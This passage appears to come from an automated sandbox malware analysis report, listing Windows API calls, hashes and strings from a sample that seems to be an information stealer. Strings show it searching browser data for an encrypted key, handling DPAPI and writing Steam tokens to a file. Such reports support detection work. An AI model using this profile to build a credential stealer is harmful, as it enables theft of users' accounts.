                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: f00917e3afbae2e930011928db1d69c3dca82938efa695ec1ed26e11e7a829e4
                          • Instruction ID: 7f7bff802f7e1b74e0bee3fdef91f92c15f34cf5220d53c2f0eaf23884eb3a04
                          • Opcode Fuzzy Hash: f00917e3afbae2e930011928db1d69c3dca82938efa695ec1ed26e11e7a829e4
                          • Instruction Fuzzy Hash: E251CE719002029FCB36DF68D884A9BB7F9EF59304F15845AED46DB605EF30E941CB50
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 003C2925
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003C292C
                          • RegOpenKeyExA.ADVAPI32(80000002,00F1B9A8,00000000,00020119,003C28A9), ref: 003C294B
                          • RegQueryValueExA.ADVAPI32(003C28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 003C2965
                          • RegCloseKey.ADVAPI32(003C28A9), ref: 003C296F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: 0bba4166fa6ecbec15d237b23a8b54b542c3c0517a62b65c4fa27cbad4435f43
                          • Instruction ID: 0f62316431dfade18c342dd36b59677886b4420c80b6694312eddbd80b57fec8
                          • Opcode Fuzzy Hash: 0bba4166fa6ecbec15d237b23a8b54b542c3c0517a62b65c4fa27cbad4435f43
                          • Instruction Fuzzy Hash: 6301BC75601219ABE320DBA4AC59FFB7BBCEB48711F10009AFE45D7240EA315A0887A0
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 003C2895
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003C289C
                            • Part of subcall function 003C2910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 003C2925
                            • Part of subcall function 003C2910: RtlAllocateHeap.NTDLL(00000000), ref: 003C292C
                            • Part of subcall function 003C2910: RegOpenKeyExA.ADVAPI32(80000002,00F1B9A8,00000000,00020119,003C28A9), ref: 003C294B
                            • Part of subcall function 003C2910: RegQueryValueExA.ADVAPI32(003C28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 003C2965
                            • Part of subcall function 003C2910: RegCloseKey.ADVAPI32(003C28A9), ref: 003C296F
                          • RegOpenKeyExA.ADVAPI32(80000002,00F1B9A8,00000000,00020119,003B9500), ref: 003C28D1
                          • RegQueryValueExA.ADVAPI32(003B9500,00F2E8F0,00000000,00000000,00000000,000000FF), ref: 003C28EC
                          • RegCloseKey.ADVAPI32(003B9500), ref: 003C28F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: f78b58b7727186be4a0cc79d6bef7c8b524780e9128e79b97258172267fb91ab
                          • Instruction ID: ecf9b401d76b776c3ec994f2fa2acf054bda41b61febf32c3cacc9567b89a151
                          • Opcode Fuzzy Hash: f78b58b7727186be4a0cc79d6bef7c8b524780e9128e79b97258172267fb91ab
                          • Instruction Fuzzy Hash: 0F01A275601209BBD720ABA4AC4DFBB777DEB54311F00015BFE08D6250DA705D48A7A0
                          APIs
                          • LoadLibraryA.KERNEL32(?), ref: 003A723E
                          • GetProcessHeap.KERNEL32(00000008,00000010), ref: 003A7279
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003A7280
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 003A72C3
                          • HeapFree.KERNEL32(00000000), ref: 003A72CA
                          • GetProcAddress.KERNEL32(00000000,?), ref: 003A7329
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                          • String ID:
                          • API String ID: 174687898-0
                          • Opcode ID: 1c6646455758fcf6fd035040a1452a0b9aac2608f53c849ccee96f26f32a14eb
                          • Instruction ID: beb512ced21539a9e1ad13e2631b681b0420e7cf8285952a79cb0f80874efcf0
                          • Opcode Fuzzy Hash: 1c6646455758fcf6fd035040a1452a0b9aac2608f53c849ccee96f26f32a14eb
                          • Instruction Fuzzy Hash: DE415E757057069BDB21CF69EC84BAAB3E8FB86305F15456AEC4DC7340E631E900DB90
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 003A9CA8
                          • LocalAlloc.KERNEL32(00000040,?), ref: 003A9CDA
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 003A9D03
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocLocallstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2746078483-738592651
                          • Opcode ID: 918ed29ce955f9d384e300933e947184671aff8b3c53d0d29f38c28a9fe46f7a
                          • Instruction ID: 1f2365916e56a230aecaf44547a10de0d64f38d7cede4b18e99c84099757ad02
                          • Opcode Fuzzy Hash: 918ed29ce955f9d384e300933e947184671aff8b3c53d0d29f38c28a9fe46f7a
                          • Instruction Fuzzy Hash: F841A471A002099BCB22EF78DC457EF77B4EF56314F0585AAE915BB262EA30DD44C790
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003BEA24
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BEA53
                          • lstrcat.KERNEL32(?,00000000), ref: 003BEA61
                          • lstrcat.KERNEL32(?,003D1794), ref: 003BEA7A
                          • lstrcat.KERNEL32(?,00F29108), ref: 003BEA8D
                          • lstrcat.KERNEL32(?,003D1794), ref: 003BEA9F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: f1e1bc4318ddfb50d6bf70b00d28e718878c0bc3c6153de01f0ac93cd8b73587
                          • Instruction ID: c2ec1012b47101289094cfc5293fd5c91862f7365764c174f0139daef8344316
                          • Opcode Fuzzy Hash: f1e1bc4318ddfb50d6bf70b00d28e718878c0bc3c6153de01f0ac93cd8b73587
                          • Instruction Fuzzy Hash: BF419971A11119ABCB26EF68DC46FEE7378FF59300F00445AFA1A9B291DF709E489B50
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003BECDF
                          • lstrlen.KERNEL32(00000000), ref: 003BECF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BED1D
                          • lstrlen.KERNEL32(00000000), ref: 003BED24
                          • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 003BED52
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: steam_tokens.txt
                          • API String ID: 367037083-401951677
                          • Opcode ID: afbd5051ddd72247185faabbab14adb4b358fc85ccac3a703c7aecb321e551f9
                          • Instruction ID: e3b7fb9099c3b18b4d6b2f05a2a31a0c1eae0c2191aa3329615851700436999d
                          • Opcode Fuzzy Hash: afbd5051ddd72247185faabbab14adb4b358fc85ccac3a703c7aecb321e551f9
                          • Instruction Fuzzy Hash: 58316B31A111155BC723BB7CE84AA9F7BA9EF12704F051029F946DFA22EF20DC2687C1
                          APIs
                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,003A140E), ref: 003A9A9A
                          • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,003A140E), ref: 003A9AB0
                          • LocalAlloc.KERNEL32(00000040,?,?,?,?,003A140E), ref: 003A9AC7
                          • ReadFile.KERNEL32(00000000,00000000,?,003A140E,00000000,?,?,?,003A140E), ref: 003A9AE0
                          • LocalFree.KERNEL32(?,?,?,?,003A140E), ref: 003A9B00
                          • CloseHandle.KERNEL32(00000000,?,?,?,003A140E), ref: 003A9B07
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: 2a7190b5ca2b24361e47c2e6e5bee084bfaf451471f900b2fc6942d72efc94a0
                          • Instruction ID: 54eb0a7ddae998b27f70252ae9cf887435bea34495d3c2bb82d267f576daae9b
                          • Opcode Fuzzy Hash: 2a7190b5ca2b24361e47c2e6e5bee084bfaf451471f900b2fc6942d72efc94a0
                          • Instruction Fuzzy Hash: 4711217160520AAFDB21DFA9DC88FBA776CEB15740F11416BF911A6280EB709D54CB60
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 003C5B14
                            • Part of subcall function 003CA173: std::exception::exception.LIBCMT ref: 003CA188
                            • Part of subcall function 003CA173: std::exception::exception.LIBCMT ref: 003CA1AE
                          • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 003C5B7C
                          • memmove.MSVCRT(00000000,?,?), ref: 003C5B89
                          • memmove.MSVCRT(00000000,?,?), ref: 003C5B98
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long
                          • API String ID: 2052693487-3788999226
                          • Opcode ID: 2ea607957dc109fec56ef5a408928d5dd29e4ddd041e36ba7c97a19305ad6371
                          • Instruction ID: 182e5123cbdcdac6b1e7d9a3db9c7ae1c931e8ba8def6f22ba2595593389b0fc
                          • Opcode Fuzzy Hash: 2ea607957dc109fec56ef5a408928d5dd29e4ddd041e36ba7c97a19305ad6371
                          • Instruction Fuzzy Hash: AD415072A005199FCF19DF6CC995BAEBBA5EB88310F15822DE919EB344D630ED418B90
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 003B7D58
                            • Part of subcall function 003CA1C0: std::exception::exception.LIBCMT ref: 003CA1D5
                            • Part of subcall function 003CA1C0: std::exception::exception.LIBCMT ref: 003CA1FB
                          • std::_Xinvalid_argument.LIBCPMT ref: 003B7D76
                          • std::_Xinvalid_argument.LIBCPMT ref: 003B7D91
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_$std::exception::exception
                          • String ID: invalid string position$string too long
                          • API String ID: 3310641104-4289949731
                          • Opcode ID: f213974a9ebfcd037e348a7126b41d9eb56b87a76c702e76d699fec440974b6e
                          • Instruction ID: 7445f32fc78a09ce57a70973124df4a281be76fc807dd908950f412f2212a185
                          • Opcode Fuzzy Hash: f213974a9ebfcd037e348a7126b41d9eb56b87a76c702e76d699fec440974b6e
                          • Instruction Fuzzy Hash: 1521E9323186044BD722DE2CD881A7AF7E5EFD1798B214A6EE582CBB41D770DC408761
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C33EF
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003C33F6
                          • GlobalMemoryStatusEx.KERNEL32 ref: 003C3411
                          • wsprintfA.USER32 ref: 003C3437
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB
                          • API String ID: 2922868504-2651807785
                          • Opcode ID: 794044fc6a7125fcce5017b9b5ac6504fde8e5b7d80fa873599a3035f6f0f460
